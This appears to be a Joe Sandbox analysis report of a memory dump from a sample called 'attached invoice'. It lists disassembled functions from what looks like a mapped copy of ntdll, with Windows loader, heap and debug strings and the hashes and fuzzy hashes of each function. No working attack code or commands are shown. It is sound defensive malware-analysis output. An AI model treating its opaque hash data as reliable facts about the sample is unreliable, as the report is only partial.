                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                    • API String ID: 0-108210295
                                                                                                    • Opcode ID: 3ed33e8337b61b2010ad2f7bbdc578e4bd2372716df8706cb19c26a9b078d24e
                                                                                                    • Instruction ID: 2a8cae443e93be26a2a802148fd87d40bc18595f6434499447e32f6a3266e109
                                                                                                    • Opcode Fuzzy Hash: 3ed33e8337b61b2010ad2f7bbdc578e4bd2372716df8706cb19c26a9b078d24e
                                                                                                    • Instruction Fuzzy Hash: 0581F6B5A40308BFDF229B0D8C85DAA3B38EF97715F04085CF50CAB216E3A99551CB72
                                                                                                    Function 01918540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • corrupted critical section, xrefs: 019552CD
                                                                                                    • Critical section debug info address, xrefs: 0195522A, 01955339
                                                                                                    • Thread identifier, xrefs: 01955345
                                                                                                    • Invalid debug info address of this critical section, xrefs: 019552C1
                                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019552ED
                                                                                                    • Critical section address, xrefs: 01955230, 019552C7, 0195533F
                                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 0195534E
                                                                                                    • 8, xrefs: 019550EE
                                                                                                    • Critical section address., xrefs: 0195530D
                                                                                                    • Address of the debug info found in the active list., xrefs: 019552B9, 01955305
                                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019552D9
                                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01955215, 019552A1, 01955324
                                                                                                    • undeleted critical section in freed memory, xrefs: 01955236
                                                                                                    • double initialized or corrupted critical section, xrefs: 01955313
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                    • API String ID: 0-2368682639
                                                                                                    • Opcode ID: 7fca86b0dbddf67f397cd76b3a94a9d8628dd041d0536c697727af4a9c8aa959
                                                                                                    • Instruction ID: eb4afc38dce3bfa0c340624e042d87f76090e98cbfa566cd99b7aabf0c247eff
                                                                                                    • Opcode Fuzzy Hash: 7fca86b0dbddf67f397cd76b3a94a9d8628dd041d0536c697727af4a9c8aa959
                                                                                                    • Instruction Fuzzy Hash: 98818C71A41318EFEB60CF99C880BAEBBB9FB49B10F21415DF909B7241C774AA41CB50
                                                                                                    Function 01912919 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 019522A2
                                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 0195221C
                                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019520EE
                                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019523F5
                                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 0195240C
                                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 0195242E
                                                                                                    • @, xrefs: 019523A5
                                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 01952429
                                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019522CA
                                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01952213
                                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01952310
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                    • API String ID: 0-4009184096
                                                                                                    • Opcode ID: f47378fdd547d3ff7416e89326f45ed5c123fe07dc2e35b40d6db3ac0dd2d25c
                                                                                                    • Instruction ID: 25c9febb384b9c60a363f4eaaa851ccb70149ae77148315f4946bb41e16f5a2d
                                                                                                    • Opcode Fuzzy Hash: f47378fdd547d3ff7416e89326f45ed5c123fe07dc2e35b40d6db3ac0dd2d25c
                                                                                                    • Instruction Fuzzy Hash: 82026DB5D002299BDB61DF14CC80BAAB7B8AB55704F4045E9EA0DB7241E770AFC4CF99
                                                                                                    Function 019886C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                    • API String ID: 0-2515994595
                                                                                                    • Opcode ID: 0603ebb83cd1060f87815db5ddb78e566bb192f0c7a2832741bdb059d1c1a19a
                                                                                                    • Instruction ID: 02ebd1ac4564a7abecde256867acc2e057a3a82933b9dd7e69e24b9c7620b2fa
                                                                                                    • Opcode Fuzzy Hash: 0603ebb83cd1060f87815db5ddb78e566bb192f0c7a2832741bdb059d1c1a19a
                                                                                                    • Instruction Fuzzy Hash: 24517C715143159BD325EF18D884AABBBECEBC4750F44491EFAADC3281E770D648CBA2
                                                                                                    Function 01990835 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                    • API String ID: 0-1357697941
                                                                                                    • Opcode ID: e79627ef44d3225e60e82c7bcc9640db3c22d1511f60ddbb7707a3d4cac9c929
                                                                                                    • Instruction ID: 267d701685ac8acddb4ac975016cf1dc25a39fe64fd876405510ca3fb352166d
                                                                                                    • Opcode Fuzzy Hash: e79627ef44d3225e60e82c7bcc9640db3c22d1511f60ddbb7707a3d4cac9c929
                                                                                                    • Instruction Fuzzy Hash: 70F1D031A00246AFDF25DF6CC484BAABBFDFF09304F088459E5A99B241D734AA45CB91
                                                                                                    Function 01978D0A Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                    • API String ID: 2994545307-3063724069
                                                                                                    • Opcode ID: 59c971991b5d6ee115de0c9f14cab0bc258a7cf19bd8610da1bcaefcddf4a494
                                                                                                    • Instruction ID: 3e0dfad9fa10ef9cebbe44740df090d83de259aee9a4036931670c8341b885b4
                                                                                                    • Opcode Fuzzy Hash: 59c971991b5d6ee115de0c9f14cab0bc258a7cf19bd8610da1bcaefcddf4a494
                                                                                                    • Instruction Fuzzy Hash: DBD1A172805316AFD722DB548854F6BBBECFF94B28F04092DFA9C97240E774D9448B92
                                                                                                    Function 01968633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 019686BD
                                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 019686E7
                                                                                                    • HandleTraces, xrefs: 0196890F
                                                                                                    • VerifierFlags, xrefs: 019688D0
                                                                                                    • VerifierDlls, xrefs: 0196893D
                                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 0196880F
                                                                                                    • VerifierDebug, xrefs: 01968925
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                    • API String ID: 0-3223716464
                                                                                                    • Opcode ID: cfd9f11bbc4b056782c22c53bc66d313bcd819e2ccc274f5f128963a87af80b1
                                                                                                    • Instruction ID: 72a62ce069b15ab54cf559884fadcd8d9634c246a495e88b410798abc18e87c7
                                                                                                    • Opcode Fuzzy Hash: cfd9f11bbc4b056782c22c53bc66d313bcd819e2ccc274f5f128963a87af80b1
                                                                                                    • Instruction Fuzzy Hash: 81913871605316AFE721EF689880B5ABBACEB90B14F05491CFB4CAB351D730DD45C7A2
                                                                                                    Function 01964A57 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • LdrpProtectedCopyMemory, xrefs: 01964A74
                                                                                                    • LdrpGenericExceptionFilter, xrefs: 01964A7C
                                                                                                    • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01964A75
                                                                                                    • Execute '.cxr %p' to dump context, xrefs: 01964B31
                                                                                                    • minkernel\ntdll\ldrutil.c, xrefs: 01964A86
                                                                                                    • ***Exception thrown within loader***, xrefs: 01964AA7
                                                                                                    • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01964AB8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                                    • API String ID: 0-2973941816
                                                                                                    • Opcode ID: 55b7a2fee76265a7c9d5d27f8b345f7a6fcbf05447bb6fda331d503979d420b8
                                                                                                    • Instruction ID: 75b6abb1de62de4327da5c1c078ea44838f60211d4c7ff62827e679d4ca452b8
                                                                                                    • Opcode Fuzzy Hash: 55b7a2fee76265a7c9d5d27f8b345f7a6fcbf05447bb6fda331d503979d420b8
                                                                                                    • Instruction Fuzzy Hash: E32165762041027BE628DAFEDC85E3E7B6DFB82A66F14090AF61AD7640C520DB11C239
                                                                                                    Function 018EE9A0 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                    • API String ID: 0-1109411897
                                                                                                    • Opcode ID: a99ee69d96c58e359e5b97da2f3e2fe46468a3630a2d2b1d36be4aeef955631f
                                                                                                    • Instruction ID: f7dd112c0beb50b2d66a73b3daf166b2002583c82cd89bf54e6bbad612a31cf3
                                                                                                    • Opcode Fuzzy Hash: a99ee69d96c58e359e5b97da2f3e2fe46468a3630a2d2b1d36be4aeef955631f
                                                                                                    • Instruction Fuzzy Hash: 1CA21874A0562A8FDF64DF18C898BADBBB5AF45304F1442E9D91DE7290DB319E81CF40
                                                                                                    Function 018EAD00 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                    • API String ID: 0-4098886588
                                                                                                    • Opcode ID: 37e7f05af0971d00d0b5f08f76aef75df16c9ba9fd4b2b63a759a547e043b29d
                                                                                                    • Instruction ID: 3ee8d78ca617c5f106d1e73a50ab345c4360435d444bb38ea7c68e6aa07df332
                                                                                                    • Opcode Fuzzy Hash: 37e7f05af0971d00d0b5f08f76aef75df16c9ba9fd4b2b63a759a547e043b29d
                                                                                                    • Instruction Fuzzy Hash: B4329E7090426D8BDB26CB28C898BEEBBF9BF46744F1441E9E859A7251D7319F81CF40
                                                                                                    Function 0191631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-792281065
                                                                                                    • Opcode ID: 40a6edef28063461c4ae6669513ae76263f15e476e10830ca9974310b311f302
                                                                                                    • Instruction ID: bd2f9af357f0cc47135e77063375bcc8dbd25a5adbc3dda990d3456122335e3d
                                                                                                    • Opcode Fuzzy Hash: 40a6edef28063461c4ae6669513ae76263f15e476e10830ca9974310b311f302
                                                                                                    • Instruction Fuzzy Hash: 2A915870E063199BEB35DF28C845B697BB5BB80B55F10002DEE0DBB285D7B499C2C7A1
                                                                                                    Function 018D640D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 0193977C
                                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 019397B9
                                                                                                    • LdrpInitShimEngine, xrefs: 01939783, 01939796, 019397BF
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 019397A0, 019397C9
                                                                                                    • apphelp.dll, xrefs: 018D6446
                                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01939790
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-204845295
                                                                                                    • Opcode ID: a0b22d2b2c9ab58da9e054d3b1d2db6a3f199522a28f8b73a3159a4fdef26c1a
                                                                                                    • Instruction ID: 364b0b65628f1b9312e4d7e91b717a90633d463a37ba00d2c77fb27a104f23b7
                                                                                                    • Opcode Fuzzy Hash: a0b22d2b2c9ab58da9e054d3b1d2db6a3f199522a28f8b73a3159a4fdef26c1a
                                                                                                    • Instruction Fuzzy Hash: 0E5190712093059BE321DF24D891B6A77E9BBC4748F50091DFA8AD72A0E674DA44CB93
                                                                                                    Function 01912594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01951F82
                                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01951FA9
                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01951F8A
                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01951FC9
                                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 01951F6A, 01951FA4, 01951FC4
                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 01951F6F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                    • API String ID: 0-861424205
                                                                                                    • Opcode ID: 94c28d8cd426ceac8a6559eadc6a420fe523a6cf8ca97f472dc95220564956da
                                                                                                    • Instruction ID: a88c50f0b12b01ee9af5865d78a6baaa9f3a5c475c511b64f03bee30cc487d45
                                                                                                    • Opcode Fuzzy Hash: 94c28d8cd426ceac8a6559eadc6a420fe523a6cf8ca97f472dc95220564956da
                                                                                                    • Instruction Fuzzy Hash: F1310876B002197BE711DB8A9C85F5B7B6CDB50A90F14046DBE09B7244D270EA4087A4
                                                                                                    Function 0191C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • LdrpInitializeImportRedirection, xrefs: 01957F82, 01957FF6
                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01957F8C, 01958000
                                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 01957F7B
                                                                                                    • LdrpInitializeProcess, xrefs: 0191C5E4
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0191C5E3
                                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 01957FF0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                    • API String ID: 0-475462383
                                                                                                    • Opcode ID: 353a9d6bdc7ee83ceb56d47a64fe1735fa61e25e93fd487275af9b83dcccde84
                                                                                                    • Instruction ID: a63df73b7ce8a3f16a6fc8da5937356f89c4c77c5359b7d3bb701a0c7e88c57f
                                                                                                    • Opcode Fuzzy Hash: 353a9d6bdc7ee83ceb56d47a64fe1735fa61e25e93fd487275af9b83dcccde84
                                                                                                    • Instruction Fuzzy Hash: FF31F3716493069FD324EF69D885E2ABB94EFD4B10F01455CFD89AB391E630ED04C7A2
                                                                                                    Function 01964BC0 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                    • API String ID: 0-2518169356
                                                                                                    • Opcode ID: 317c8e5732ac84cc6b68e7cfa46f747abaabb8595c624aad69944e30b15bc44e
                                                                                                    • Instruction ID: d8d57667f2b66696deeefd2635ff0a778010185174d9bd7e00b2a7d5ecf7f829
                                                                                                    • Opcode Fuzzy Hash: 317c8e5732ac84cc6b68e7cfa46f747abaabb8595c624aad69944e30b15bc44e
                                                                                                    • Instruction Fuzzy Hash: DC91A172D006299BCB25CF9CC881AEEB7F8EF48710F154169E919E7354D779D901CBA0
                                                                                                    Function 018EA2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                    • API String ID: 0-379654539
                                                                                                    • Opcode ID: 9f1f7c30f9c8d50b4a7fc098bc8de05547ac2c2462d8a0b503a80e750a3c4e93
                                                                                                    • Instruction ID: d34208afeef72750a95c9bcf5d4810650e7b988b1113155db4339dabd4445f6c
                                                                                                    • Opcode Fuzzy Hash: 9f1f7c30f9c8d50b4a7fc098bc8de05547ac2c2462d8a0b503a80e750a3c4e93
                                                                                                    • Instruction Fuzzy Hash: 94C19E74108386CFD719CF58C088B6AB7E4FF86B08F044969F996DB291E374CA49CB56
                                                                                                    Function 01918322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0191847E
                                                                                                    • LdrpInitializeProcess, xrefs: 01918342
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01918341
                                                                                                    • @, xrefs: 019184B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-1918872054
                                                                                                    • Opcode ID: 9aa422f7a2129e105da0fe0bc77bc7a57e4000f8fbe84a0ba79f12f6fd4dae7c
                                                                                                    • Instruction ID: 68b1dc5b8e746b79ca58e8ca720dba8395bfc14bce282a714baa1dc8601aa63d
                                                                                                    • Opcode Fuzzy Hash: 9aa422f7a2129e105da0fe0bc77bc7a57e4000f8fbe84a0ba79f12f6fd4dae7c
                                                                                                    • Instruction Fuzzy Hash: 3691BF71148349AFE721DF25C885FABBBECAB84740F40092DFA8DD2195E734DA84DB52
                                                                                                    Function 018F0B10 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 019452FA
                                                                                                    • HEAP[%wZ]: , xrefs: 019452DE, 0194539F
                                                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 019453BB
                                                                                                    • HEAP: , xrefs: 019452ED, 019453AE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                    • API String ID: 0-1657114761
                                                                                                    • Opcode ID: ee602602db1a63f85564829578de96bcbe5fbb12ab6de3db519acd03c1b2b080
